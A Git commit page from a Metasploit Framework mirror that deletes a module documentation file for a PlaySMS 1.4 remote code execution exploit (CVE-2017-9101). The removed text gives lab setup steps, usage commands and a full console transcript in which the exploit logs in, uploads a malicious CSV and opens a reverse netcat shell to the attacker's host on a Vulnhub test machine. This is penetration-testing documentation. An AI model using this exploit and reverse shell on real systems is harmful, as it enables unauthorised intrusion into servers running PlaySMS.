infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Delete playsms_uploadcsv_exec.md

GSoC/Meterpreter_Web_Console
Touhid M Shaikh 2018-03-18 13:57:04 +05:30 committed by GitHub
parent 0e0fcdf727
commit 0817e6b15f
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 0 additions and 159 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

159
documentation/modules/exploit/unix/http/playsms_uploadcsv_exec.md
View File

@ -1,159 +0,0 @@
## Description
import.php (aka the Phonebook import feature) in PlaySMS 1.4 allows remote code execution via vectors involving the User-Agent HTTP header
and PHP code in the name of a file.
CVE ID : CVE-2017-9101
## Vulnerable Application
According To publicly exploit Disclosure of PlaySMS 1.4
this application is vulnerable to 'import.php' Remote Code Execution
read more : https://www.exploit-db.com/exploits/42044/
**Vulnerable Application Link**
https://www.exploit-db.com/apps/577b6363d3e8baf4696744f911372ea6-playsms-1.4.tar.gz
## Vulnerable Application Installation Setup.
Download Application : ```wget https://www.exploit-db.com/apps/577b6363d3e8baf4696744f911372ea6-playsms-1.4.tar.gz```
Extract..
Move In WebDirectory : ```mv playsms-1.4/web/* /var/www/html/```
Change Owner : ```chown -R www-data:www-data /var/www/html/```
Set DB creds in Config File. And dump playsms-1.4/db/playsms.sql in your playsms database.
Now Visit.
Vulnhub machine : https://www.vulnhub.com/entry/dina-101,200/
**And Follow Clipbucket Installer**
Visit : http://localhost/
## Verification Steps
1. Install the application
2. Start msfconsole
3. Do: `use exploit/unix/http/playsms_uploadcsv_exec`
4. Do: `set rport <port>`
5. Do: `set rhost <ip>`
6. Do: `set targeturi SecreTSMSgatwayLogin`
6. Do: `check`
```
[*] 10.22.1.10:80 The target appears to be vulnerable.
```
7. Do: `set lport <port>`
8. Do: `set lhost <ip>`
9. Do: `exploit`
10. You should get a shell.
## Options
**TARGETURI**
TARGETURI by default is `/`, however it can be changed.
## Scenarios
**TESTED AGAINST LINUX**
```
msf auxiliary(scanner/smb/smb_enum_gpp) > use exploit/unix/http/playsms_uploadcsv_exec
msf exploit(unix/http/playsms_uploadcsv_exec) > set targeturi SecreTSMSgatwayLogin
targeturi => SecreTSMSgatwayLogin
msf exploit(unix/http/playsms_uploadcsv_exec) > set rhost 10.22.1.10
rhost => 10.22.1.10
msf exploit(unix/http/playsms_uploadcsv_exec) > set username touhid
username => touhid
msf exploit(unix/http/playsms_uploadcsv_exec) > set password diana
password => diana
msf exploit(unix/http/playsms_uploadcsv_exec) > set lhost 10.22.1.9
lhost => 10.22.1.9
msf exploit(unix/http/playsms_uploadcsv_exec) > show options
Module options (exploit/unix/http/playsms_uploadcsv_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD diana yes Password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 10.22.1.10 yes The target address
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI SecreTSMSgatwayLogin yes Base playsms directory path
USERNAME touhid yes Username to authenticate with
VHOST no HTTP server virtual host
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.22.1.9 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 PlaySMS 1.4
msf exploit(unix/http/playsms_uploadcsv_exec) > check
[*] 10.22.1.10:80 The target appears to be vulnerable.
msf exploit(unix/http/playsms_uploadcsv_exec) > exploit
[*] Started reverse TCP handler on 10.22.1.9:4444
[*] Trying to Login ......
[+] Authentication successful: touhid:diana
[*] Trying to upload malicious CSV file ....
[*] Command shell session 1 opened (10.22.1.9:4444 -> 10.22.1.10:57706) at 2018-03-18 13:10:24 +0530
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uname -a
Linux Dina 3.2.0-23-generic-pae #36-Ubuntu SMP Tue Apr 10 22:19:09 UTC 2012 i686 i686 i386 GNU/Linux
^Z
Background session 1? [y/N] y
msf exploit(unix/http/playsms_uploadcsv_exec) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell cmd/unix 10.22.1.9:4444 -> 10.22.1.10:57706 (10.22.1.10)
msf exploit(unix/http/playsms_uploadcsv_exec) > set verbose true
verbose => true
msf exploit(unix/http/playsms_uploadcsv_exec) > exploit
[*] Started reverse TCP handler on 10.22.1.9:4444
[+] X-CSRF-Token for login : cf6f56ccf44e26d046ed153319340c14
[*] Trying to Login ......
[+] Authentication successful: touhid:diana
[+] X-CSRF-Token for upload : 7bd4ffbe733ecaa9bea1c5dce9e040e7
[*] Trying to upload malicious CSV file ....
[*] Command shell session 2 opened (10.22.1.9:4444 -> 10.22.1.10:57711) at 2018-03-18 13:17:09 +0530
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uname -a
Linux Dina 3.2.0-23-generic-pae #36-Ubuntu SMP Tue Apr 10 22:19:09 UTC 2012 i686 i686 i386 GNU/Linux
ls -la
total 52
drwxr-xr-x 6 root root 4096 Oct 17 19:09 .
drwxr-xr-x 9 root root 4096 Oct 17 20:51 ..
-rw-r--r-- 1 root root 2908 Oct 17 19:08 config-dist.php
-rw-r--r-- 1 root root 2903 Oct 17 19:11 config.php
drwxr-xr-x 3 root root 4096 Oct 17 19:08 inc
-rw-r--r-- 1 root root 3205 Oct 17 19:08 index.php
-rw-r--r-- 1 root root 13463 Oct 17 19:08 init.php
drwxr-xr-x 3 root root 4096 Oct 17 19:08 lib
drwxr-xr-x 7 root root 4096 Oct 17 19:08 plugin
drwxr-xr-x 3 root root 4096 Oct 17 19:08 storage
```